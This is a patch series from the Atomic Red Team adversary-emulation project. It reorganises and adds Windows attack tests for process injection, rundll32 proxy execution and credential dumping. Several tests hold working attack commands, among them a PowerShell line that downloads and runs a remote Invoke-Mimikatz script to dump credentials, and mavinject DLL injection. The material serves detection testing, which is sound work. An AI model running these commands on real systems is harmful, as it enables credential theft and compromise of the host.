+ +## Atomic Test #1 - Process Injection via mavinject.exe +Windows 10 Utility To Inject DLLS. + +Upon successful execution, powershell.exe will download T1055.dll to disk. Powershell will then spawn mavinject.exe to perform process injection in T1055.dll. +With default arguments, expect to see a MessageBox, with notepad's icon in taskbar. + +**Supported Platforms:** Windows + + + + +#### Inputs: +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| process_id | PID of input_arguments | Integer | (Start-Process notepad -PassThru).id| +| dll_payload | DLL to Inject | Path | PathToAtomicsFolder\T1055.001\src\x64\T1055.001.dll| + + +#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin) + + +```powershell +$mypid = #{process_id} +mavinject $mypid /INJECTRUNNING #{dll_payload} +``` + + + + +#### Dependencies: Run with `powershell`! +##### Description: Utility to inject must exist on disk at specified location (#{dll_payload}) +##### Check Prereq Commands: +```powershell +if (Test-Path #{dll_payload}) {exit 0} else {exit 1} +``` +##### Get Prereq Commands: +```powershell +New-Item -Type Directory (split-path #{dll_payload}) -ErrorAction ignore | Out-Null +Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1055.001/src/x64/T1055.001.dll" -OutFile "#{dll_payload}" +``` + + + + +
diff --git a/atomics/T1055/T1055.md b/atomics/T1055/T1055.md index 33744ad2a9..d314dc1e54 100644 --- a/atomics/T1055/T1055.md +++ b/atomics/T1055/T1055.md @@ -8,63 +8,14 @@ More sophisticated samples may perform multiple process injections to segment mo ## Atomic Tests -- [Atomic Test #1 - Process Injection via mavinject.exe](#atomic-test-1---process-injection-via-mavinjectexe) +- [Atomic Test #1 - Shellcode execution via VBA](#atomic-test-1---shellcode-execution-via-vba) -- [Atomic Test #2 - Shellcode execution via VBA](#atomic-test-2---shellcode-execution-via-vba) +- [Atomic Test #2 - Remote Process Injection in LSASS via mimikatz](#atomic-test-2---remote-process-injection-in-lsass-via-mimikatz) -- [Atomic Test #3 - Remote Process Injection in LSASS via mimikatz](#atomic-test-3---remote-process-injection-in-lsass-via-mimikatz) - -
- -## Atomic Test #1 - Process Injection via mavinject.exe -Windows 10 Utility To Inject DLLS. - -Upon successful execution, powershell.exe will download T1055.dll to disk. Powershell will then spawn mavinject.exe to perform process injection in T1055.dll. -With default arguments, expect to see a MessageBox, with notepad's icon in taskbar. - -**Supported Platforms:** Windows - - - - -#### Inputs: -| Name | Description | Type | Default Value | -|------|-------------|------|---------------| -| process_id | PID of input_arguments | Integer | (Start-Process notepad -PassThru).id| -| dll_payload | DLL to Inject | Path | PathToAtomicsFolder\T1055\src\x64\T1055.dll| - - -#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin) - - -```powershell -$mypid = #{process_id} -mavinject $mypid /INJECTRUNNING #{dll_payload} -``` - - - - -#### Dependencies: Run with `powershell`! -##### Description: Utility to inject must exist on disk at specified location (#{dll_payload}) -##### Check Prereq Commands: -```powershell -if (Test-Path #{dll_payload}) {exit 0} else {exit 1} -``` -##### Get Prereq Commands: -```powershell -New-Item -Type Directory (split-path #{dll_payload}) -ErrorAction ignore | Out-Null -Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1055/src/x64/T1055.dll" -OutFile "#{dll_payload}" -``` - - - - -

-## Atomic Test #2 - Shellcode execution via VBA +## Atomic Test #1 - Shellcode execution via VBA This module injects shellcode into a newly created process and executes. By default the shellcode is created, with Metasploit, for use on x86-64 Windows 10 machines. @@ -110,7 +61,7 @@ Write-Host "You will need to install Microsoft Word (64-bit) manually to meet th

-## Atomic Test #3 - Remote Process Injection in LSASS via mimikatz +## Atomic Test #2 - Remote Process Injection in LSASS via mimikatz Use mimikatz to remotely (via psexec) dump LSASS process content for RID 500 via code injection (new thread). It must be executed in the context of a user who is privileged on remote `machine`. diff --git a/atomics/T1059.003/T1059.003.md b/atomics/T1059.003/T1059.003.md index 334ad38ef8..118bee9ba1 100644 --- a/atomics/T1059.003/T1059.003.md +++ b/atomics/T1059.003/T1059.003.md @@ -10,6 +10,8 @@ Adversaries may leverage cmd.exe to execute various commands and pa - [Atomic Test #1 - Create and Execute Batch Script](#atomic-test-1---create-and-execute-batch-script) +- [Atomic Test #2 - Writes text to a file and displays it.](#atomic-test-2---writes-text-to-a-file-and-displays-it) +
@@ -57,4 +59,38 @@ Set-Content -Path #{script_path} -Value "#{command_to_execute}" +
+
+ +## Atomic Test #2 - Writes text to a file and displays it. +Writes text to a file and display the results. This test is intended to emulate the dropping of a malicious file to disk. + +**Supported Platforms:** Windows + + + + +#### Inputs: +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| file_contents_path | Path to the file that the command prompt will drop. | path | %TEMP%\test.bin| +| message | Message that will be written to disk and then displayed. | string | Hello from the Windows Command Prompt!| + + +#### Attack Commands: Run with `command_prompt`! + + +```cmd +echo "#{message}" > "#{file_contents_path}" & type "#{file_contents_path}" +``` + +#### Cleanup Commands: +```cmd +del "#{file_contents_path}" +``` + + + + +
diff --git a/atomics/T1218.011/T1218.011.md b/atomics/T1218.011/T1218.011.md index 46eace6c26..a49be86f2f 100644 --- a/atomics/T1218.011/T1218.011.md +++ b/atomics/T1218.011/T1218.011.md @@ -22,6 +22,8 @@ Rundll32 can also be used to execute scripts such as JavaScript. This can be don - [Atomic Test #7 - Execution of HTA and VBS Files using Rundll32 and URL.dll](#atomic-test-7---execution-of-hta-and-vbs-files-using-rundll32-and-urldll) +- [Atomic Test #8 - Launches an executable using Rundll32 and pcwutl.dll](#atomic-test-8---launches-an-executable-using-rundll32-and-pcwutldll) +
@@ -289,4 +291,33 @@ rundll32.exe URL.dll,FileProtocolHandler PathToAtomicsFolder\T1218.011\src\akteu +
+
+ +## Atomic Test #8 - Launches an executable using Rundll32 and pcwutl.dll +Executes the LaunchApplication function in pcwutl.dll to proxy execution of an executable. + +**Supported Platforms:** Windows + + + + +#### Inputs: +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| exe_to_launch | Path of the executable to launch | path | %windir%\System32\notepad.exe| + + +#### Attack Commands: Run with `command_prompt`! + + +```cmd +rundll32.exe pcwutl.dll,LaunchApplication #{exe_to_launch} +``` + + + + + +
From 92026b8e3c3bfe4b28c1618471bc60d5adb92024 Mon Sep 17 00:00:00 2001 From: Matt Graeber <60448025+mgraeber-rc@users.noreply.github.com> Date: Mon, 22 Mar 2021 11:38:35 -0400 Subject: [PATCH 6/7] Moving Invoke-Mimikatz test to T1003.001 (#1407) --- atomics/T1003.001/T1003.001.yaml | 19 +++++++++++++++++++ atomics/T1003/T1003.yaml | 19 ------------------- 2 files changed, 19 insertions(+), 19 deletions(-) diff --git a/atomics/T1003.001/T1003.001.yaml b/atomics/T1003.001/T1003.001.yaml index 80856999b1..700642e5f1 100644 --- a/atomics/T1003.001/T1003.001.yaml +++ b/atomics/T1003.001/T1003.001.yaml @@ -296,4 +296,23 @@ atomic_tests: cleanup_command: | del "#{output_file}" >nul 2> nul name: command_prompt + elevation_required: true +- name: Powershell Mimikatz + auto_generated_guid: 66fb0bc1-3c3f-47e9-a298-550ecfefacbc + description: | + Dumps credentials from memory via Powershell by invoking a remote mimikatz script. + If Mimikatz runs successfully you will see several usernames and hashes output to the screen. + Common failures include seeing an \"access denied\" error which results when Anti-Virus blocks execution. + Or, if you try to run the test without the required administrative privleges you will see this error near the bottom of the output to the screen "ERROR kuhl_m_sekurlsa_acquireLSA" + supported_platforms: + - windows + input_arguments: + remote_script: + description: URL to a remote Mimikatz script that dumps credentials + type: Url + default: https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f650520c4b1004daf8b3ec08007a0b945b91253a/Exfiltration/Invoke-Mimikatz.ps1 + executor: + command: | + IEX (New-Object Net.WebClient).DownloadString('#{remote_script}'); Invoke-Mimikatz -DumpCreds + name: powershell elevation_required: true \ No newline at end of file diff --git a/atomics/T1003/T1003.yaml b/atomics/T1003/T1003.yaml index 2374e2ae14..911859c621 100644 --- a/atomics/T1003/T1003.yaml +++ b/atomics/T1003/T1003.yaml @@ -1,25 +1,6 @@ attack_technique: T1003 display_name: OS Credential Dumping atomic_tests: -- name: Powershell Mimikatz - auto_generated_guid: 66fb0bc1-3c3f-47e9-a298-550ecfefacbc - description: | - Dumps credentials from memory via Powershell by invoking a remote mimikatz script. - If Mimikatz runs successfully you will see several usernames and hashes output to the screen. - Common failures include seeing an \"access denied\" error which results when Anti-Virus blocks execution. - Or, if you try to run the test without the required administrative privleges you will see this error near the bottom of the output to the screen "ERROR kuhl_m_sekurlsa_acquireLSA" - supported_platforms: - - windows - input_arguments: - remote_script: - description: URL to a remote Mimikatz script that dumps credentials - type: Url - default: https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f650520c4b1004daf8b3ec08007a0b945b91253a/Exfiltration/Invoke-Mimikatz.ps1 - executor: - command: | - IEX (New-Object Net.WebClient).DownloadString('#{remote_script}'); Invoke-Mimikatz -DumpCreds - name: powershell - elevation_required: true - name: Gsecdump auto_generated_guid: 96345bfc-8ae7-4b6a-80b7-223200f24ef9 From 058b5c2423c4a6e9e226f4e5ffa1a6fd9bb1a90e Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team doc generator Date: Mon, 22 Mar 2021 15:39:07 +0000 Subject: [PATCH 7/7] Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/Indexes/Indexes-CSV/index.csv | 6 +-- atomics/Indexes/Indexes-CSV/windows-index.csv | 6 +-- atomics/Indexes/Indexes-Markdown/index.md | 6 +-- .../Indexes/Indexes-Markdown/windows-index.md | 6 +-- atomics/Indexes/index.yaml | 44 +++++++++---------- atomics/T1003.001/T1003.001.md | 34 ++++++++++++++ atomics/T1003/T1003.md | 42 ++---------------- 7 files changed, 72 insertions(+), 72 deletions(-) diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv index 245c516dcb..57a9195c8a 100644 --- a/atomics/Indexes/Indexes-CSV/index.csv +++ b/atomics/Indexes/Indexes-CSV/index.csv @@ -219,6 +219,7 @@ credential-access,T1003.001,LSASS Memory,6,Offline Credential Theft With Mimikat credential-access,T1003.001,LSASS Memory,7,LSASS read with pypykatz,c37bc535-5c62-4195-9cc3-0517673171d8,command_prompt credential-access,T1003.001,LSASS Memory,8,Dump LSASS.exe Memory using Out-Minidump.ps1,6502c8f0-b775-4dbd-9193-1298f56b6781,powershell credential-access,T1003.001,LSASS Memory,9,Create Mini Dump of LSASS.exe using ProcDump,7cede33f-0acd-44ef-9774-15511300b24b,command_prompt +credential-access,T1003.001,LSASS Memory,10,Powershell Mimikatz,66fb0bc1-3c3f-47e9-a298-550ecfefacbc,powershell credential-access,T1003.003,NTDS,1,Create Volume Shadow Copy with vssadmin,dcebead7-6c28-4b4b-bf3c-79deb1b1fc7f,command_prompt credential-access,T1003.003,NTDS,2,Copy NTDS.dit from Volume Shadow Copy,c6237146-9ea6-4711-85c9-c56d263a6b03,command_prompt credential-access,T1003.003,NTDS,3,Dump Active Directory Database with NTDSUtil,2364e33d-ceab-4641-8468-bfb1d7cc2723,command_prompt @@ -229,9 +230,8 @@ credential-access,T1040,Network Sniffing,1,Packet Capture Linux,7fe741f7-b265-49 credential-access,T1040,Network Sniffing,2,Packet Capture macOS,9d04efee-eff5-4240-b8d2-07792b873608,bash credential-access,T1040,Network Sniffing,3,Packet Capture Windows Command Prompt,a5b2f6a0-24b4-493e-9590-c699f75723ca,command_prompt credential-access,T1040,Network Sniffing,4,Windows Internal Packet Capture,b5656f67-d67f-4de8-8e62-b5581630f528,command_prompt -credential-access,T1003,OS Credential Dumping,1,Powershell Mimikatz,66fb0bc1-3c3f-47e9-a298-550ecfefacbc,powershell -credential-access,T1003,OS Credential Dumping,2,Gsecdump,96345bfc-8ae7-4b6a-80b7-223200f24ef9,command_prompt -credential-access,T1003,OS Credential Dumping,3,Credential Dumping with NPPSpy,9e2173c0-ba26-4cdf-b0ed-8c54b27e3ad6,powershell +credential-access,T1003,OS Credential Dumping,1,Gsecdump,96345bfc-8ae7-4b6a-80b7-223200f24ef9,command_prompt +credential-access,T1003,OS Credential Dumping,2,Credential Dumping with NPPSpy,9e2173c0-ba26-4cdf-b0ed-8c54b27e3ad6,powershell credential-access,T1110.002,Password Cracking,1,Password Cracking with Hashcat,6d27df5d-69d4-4c91-bc33-5983ffe91692,command_prompt credential-access,T1556.002,Password Filter DLL,1,Install and Register Password Filter DLL,a7961770-beb5-4134-9674-83d7e1fa865c,powershell credential-access,T1110.001,Password Guessing,1,Brute Force Credentials of all domain users via SMB,09480053-2f98-4854-be6e-71ae5f672224,command_prompt diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv index 2ca098310b..d52c47ba4a 100644 --- a/atomics/Indexes/Indexes-CSV/windows-index.csv +++ b/atomics/Indexes/Indexes-CSV/windows-index.csv @@ -24,6 +24,7 @@ credential-access,T1003.001,LSASS Memory,6,Offline Credential Theft With Mimikat credential-access,T1003.001,LSASS Memory,7,LSASS read with pypykatz,c37bc535-5c62-4195-9cc3-0517673171d8,command_prompt credential-access,T1003.001,LSASS Memory,8,Dump LSASS.exe Memory using Out-Minidump.ps1,6502c8f0-b775-4dbd-9193-1298f56b6781,powershell credential-access,T1003.001,LSASS Memory,9,Create Mini Dump of LSASS.exe using ProcDump,7cede33f-0acd-44ef-9774-15511300b24b,command_prompt +credential-access,T1003.001,LSASS Memory,10,Powershell Mimikatz,66fb0bc1-3c3f-47e9-a298-550ecfefacbc,powershell credential-access,T1003.003,NTDS,1,Create Volume Shadow Copy with vssadmin,dcebead7-6c28-4b4b-bf3c-79deb1b1fc7f,command_prompt credential-access,T1003.003,NTDS,2,Copy NTDS.dit from Volume Shadow Copy,c6237146-9ea6-4711-85c9-c56d263a6b03,command_prompt credential-access,T1003.003,NTDS,3,Dump Active Directory Database with NTDSUtil,2364e33d-ceab-4641-8468-bfb1d7cc2723,command_prompt @@ -32,9 +33,8 @@ credential-access,T1003.003,NTDS,5,Create Volume Shadow Copy with Powershell,542 credential-access,T1003.003,NTDS,6,Create Symlink to Volume Shadow Copy,21748c28-2793-4284-9e07-d6d028b66702,command_prompt credential-access,T1040,Network Sniffing,3,Packet Capture Windows Command Prompt,a5b2f6a0-24b4-493e-9590-c699f75723ca,command_prompt credential-access,T1040,Network Sniffing,4,Windows Internal Packet Capture,b5656f67-d67f-4de8-8e62-b5581630f528,command_prompt -credential-access,T1003,OS Credential Dumping,1,Powershell Mimikatz,66fb0bc1-3c3f-47e9-a298-550ecfefacbc,powershell -credential-access,T1003,OS Credential Dumping,2,Gsecdump,96345bfc-8ae7-4b6a-80b7-223200f24ef9,command_prompt -credential-access,T1003,OS Credential Dumping,3,Credential Dumping with NPPSpy,9e2173c0-ba26-4cdf-b0ed-8c54b27e3ad6,powershell +credential-access,T1003,OS Credential Dumping,1,Gsecdump,96345bfc-8ae7-4b6a-80b7-223200f24ef9,command_prompt +credential-access,T1003,OS Credential Dumping,2,Credential Dumping with NPPSpy,9e2173c0-ba26-4cdf-b0ed-8c54b27e3ad6,powershell credential-access,T1110.002,Password Cracking,1,Password Cracking with Hashcat,6d27df5d-69d4-4c91-bc33-5983ffe91692,command_prompt credential-access,T1556.002,Password Filter DLL,1,Install and Register Password Filter DLL,a7961770-beb5-4134-9674-83d7e1fa865c,powershell credential-access,T1110.001,Password Guessing,1,Brute Force Credentials of all domain users via SMB,09480053-2f98-4854-be6e-71ae5f672224,command_prompt diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md index 3201ae2f0a..61a28b8f77 100644 --- a/atomics/Indexes/Indexes-Markdown/index.md +++ b/atomics/Indexes/Indexes-Markdown/index.md @@ -441,6 +441,7 @@ - Atomic Test #7: LSASS read with pypykatz [windows] - Atomic Test #8: Dump LSASS.exe Memory using Out-Minidump.ps1 [windows] - Atomic Test #9: Create Mini Dump of LSASS.exe using ProcDump [windows] + - Atomic Test #10: Powershell Mimikatz [windows] - T1557 Man-in-the-Middle [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1556 Modify Authentication Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1003.003 NTDS](../../T1003.003/T1003.003.md) @@ -457,9 +458,8 @@ - Atomic Test #3: Packet Capture Windows Command Prompt [windows] - Atomic Test #4: Windows Internal Packet Capture [windows] - [T1003 OS Credential Dumping](../../T1003/T1003.md) - - Atomic Test #1: Powershell Mimikatz [windows] - - Atomic Test #2: Gsecdump [windows] - - Atomic Test #3: Credential Dumping with NPPSpy [windows] + - Atomic Test #1: Gsecdump [windows] + - Atomic Test #2: Credential Dumping with NPPSpy [windows] - [T1110.002 Password Cracking](../../T1110.002/T1110.002.md) - Atomic Test #1: Password Cracking with Hashcat [windows] - [T1556.002 Password Filter DLL](../../T1556.002/T1556.002.md) diff --git a/atomics/Indexes/Indexes-Markdown/windows-index.md b/atomics/Indexes/Indexes-Markdown/windows-index.md index de3db12a7c..24de76dc7c 100644 --- a/atomics/Indexes/Indexes-Markdown/windows-index.md +++ b/atomics/Indexes/Indexes-Markdown/windows-index.md @@ -48,6 +48,7 @@ - Atomic Test #7: LSASS read with pypykatz [windows] - Atomic Test #8: Dump LSASS.exe Memory using Out-Minidump.ps1 [windows] - Atomic Test #9: Create Mini Dump of LSASS.exe using ProcDump [windows] + - Atomic Test #10: Powershell Mimikatz [windows] - T1557 Man-in-the-Middle [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1556 Modify Authentication Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1003.003 NTDS](../../T1003.003/T1003.003.md) @@ -61,9 +62,8 @@ - Atomic Test #3: Packet Capture Windows Command Prompt [windows] - Atomic Test #4: Windows Internal Packet Capture [windows] - [T1003 OS Credential Dumping](../../T1003/T1003.md) - - Atomic Test #1: Powershell Mimikatz [windows] - - Atomic Test #2: Gsecdump [windows] - - Atomic Test #3: Credential Dumping with NPPSpy [windows] + - Atomic Test #1: Gsecdump [windows] + - Atomic Test #2: Credential Dumping with NPPSpy [windows] - [T1110.002 Password Cracking](../../T1110.002/T1110.002.md) - Atomic Test #1: Password Cracking with Hashcat [windows] - [T1556.002 Password Filter DLL](../../T1556.002/T1556.002.md) diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index 353a707908..fc78aab1d4 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml @@ -20666,6 +20666,28 @@ credential-access: ' name: command_prompt elevation_required: true + - name: Powershell Mimikatz + auto_generated_guid: 66fb0bc1-3c3f-47e9-a298-550ecfefacbc + description: "Dumps credentials from memory via Powershell by invoking a remote + mimikatz script.\nIf Mimikatz runs successfully you will see several usernames + and hashes output to the screen.\nCommon failures include seeing an \\\"access + denied\\\" error which results when Anti-Virus blocks execution. \nOr, if + you try to run the test without the required administrative privleges you + will see this error near the bottom of the output to the screen \"ERROR kuhl_m_sekurlsa_acquireLSA\"\n" + supported_platforms: + - windows + input_arguments: + remote_script: + description: URL to a remote Mimikatz script that dumps credentials + type: Url + default: https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f650520c4b1004daf8b3ec08007a0b945b91253a/Exfiltration/Invoke-Mimikatz.ps1 + executor: + command: 'IEX (New-Object Net.WebClient).DownloadString(''#{remote_script}''); + Invoke-Mimikatz -DumpCreds + +' + name: powershell + elevation_required: true T1557: technique: external_references: @@ -21388,28 +21410,6 @@ credential-access: x_mitre_version: '2.0' identifier: T1003 atomic_tests: - - name: Powershell Mimikatz - auto_generated_guid: 66fb0bc1-3c3f-47e9-a298-550ecfefacbc - description: "Dumps credentials from memory via Powershell by invoking a remote - mimikatz script.\nIf Mimikatz runs successfully you will see several usernames - and hashes output to the screen.\nCommon failures include seeing an \\\"access - denied\\\" error which results when Anti-Virus blocks execution. \nOr, if - you try to run the test without the required administrative privleges you - will see this error near the bottom of the output to the screen \"ERROR kuhl_m_sekurlsa_acquireLSA\"\n" - supported_platforms: - - windows - input_arguments: - remote_script: - description: URL to a remote Mimikatz script that dumps credentials - type: Url - default: https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f650520c4b1004daf8b3ec08007a0b945b91253a/Exfiltration/Invoke-Mimikatz.ps1 - executor: - command: 'IEX (New-Object Net.WebClient).DownloadString(''#{remote_script}''); - Invoke-Mimikatz -DumpCreds - -' - name: powershell - elevation_required: true - name: Gsecdump auto_generated_guid: 96345bfc-8ae7-4b6a-80b7-223200f24ef9 description: "Dump credentials from memory using Gsecdump.\n\nUpon successful diff --git a/atomics/T1003.001/T1003.001.md b/atomics/T1003.001/T1003.001.md index 800e5f0cec..fdf6196eaa 100644 --- a/atomics/T1003.001/T1003.001.md +++ b/atomics/T1003.001/T1003.001.md @@ -44,6 +44,8 @@ The following SSPs can be used to access credentials: - [Atomic Test #9 - Create Mini Dump of LSASS.exe using ProcDump](#atomic-test-9---create-mini-dump-of-lsassexe-using-procdump) +- [Atomic Test #10 - Powershell Mimikatz](#atomic-test-10---powershell-mimikatz) +
@@ -477,4 +479,36 @@ Copy-Item $env:TEMP\Procdump\Procdump.exe #{procdump_exe} -Force +
+
+ +## Atomic Test #10 - Powershell Mimikatz +Dumps credentials from memory via Powershell by invoking a remote mimikatz script. +If Mimikatz runs successfully you will see several usernames and hashes output to the screen. +Common failures include seeing an \"access denied\" error which results when Anti-Virus blocks execution. +Or, if you try to run the test without the required administrative privleges you will see this error near the bottom of the output to the screen "ERROR kuhl_m_sekurlsa_acquireLSA" + +**Supported Platforms:** Windows + + + + +#### Inputs: +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| remote_script | URL to a remote Mimikatz script that dumps credentials | Url | https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f650520c4b1004daf8b3ec08007a0b945b91253a/Exfiltration/Invoke-Mimikatz.ps1| + + +#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin) + + +```powershell +IEX (New-Object Net.WebClient).DownloadString('#{remote_script}'); Invoke-Mimikatz -DumpCreds +``` + + + + + +
diff --git a/atomics/T1003/T1003.md b/atomics/T1003/T1003.md index 4baa2fc72e..f716aaf559 100644 --- a/atomics/T1003/T1003.md +++ b/atomics/T1003/T1003.md @@ -7,48 +7,14 @@ Several of the tools mentioned in associated sub-techniques may be used by both ## Atomic Tests -- [Atomic Test #1 - Powershell Mimikatz](#atomic-test-1---powershell-mimikatz) +- [Atomic Test #1 - Gsecdump](#atomic-test-1---gsecdump) -- [Atomic Test #2 - Gsecdump](#atomic-test-2---gsecdump) +- [Atomic Test #2 - Credential Dumping with NPPSpy](#atomic-test-2---credential-dumping-with-nppspy) -- [Atomic Test #3 - Credential Dumping with NPPSpy](#atomic-test-3---credential-dumping-with-nppspy) - -
- -## Atomic Test #1 - Powershell Mimikatz -Dumps credentials from memory via Powershell by invoking a remote mimikatz script. -If Mimikatz runs successfully you will see several usernames and hashes output to the screen. -Common failures include seeing an \"access denied\" error which results when Anti-Virus blocks execution. -Or, if you try to run the test without the required administrative privleges you will see this error near the bottom of the output to the screen "ERROR kuhl_m_sekurlsa_acquireLSA" - -**Supported Platforms:** Windows - - - - -#### Inputs: -| Name | Description | Type | Default Value | -|------|-------------|------|---------------| -| remote_script | URL to a remote Mimikatz script that dumps credentials | Url | https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f650520c4b1004daf8b3ec08007a0b945b91253a/Exfiltration/Invoke-Mimikatz.ps1| - - -#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin) - - -```powershell -IEX (New-Object Net.WebClient).DownloadString('#{remote_script}'); Invoke-Mimikatz -DumpCreds -``` - - - - - - -

-## Atomic Test #2 - Gsecdump +## Atomic Test #1 - Gsecdump Dump credentials from memory using Gsecdump. Upon successful execution, you should see domain\username's following by two 32 characters hashes. @@ -103,7 +69,7 @@ if(Invoke-WebRequestVerifyHash "#{gsecdump_url}" "$binpath" #{gsecdump_bin_hash}

-## Atomic Test #3 - Credential Dumping with NPPSpy +## Atomic Test #2 - Credential Dumping with NPPSpy Changes ProviderOrder Registry Key Parameter and creates Key for NPPSpy. After user's logging in cleartext password is saved in C:\NPPSpy.txt. Clean up deletes the files and reverses Registry changes.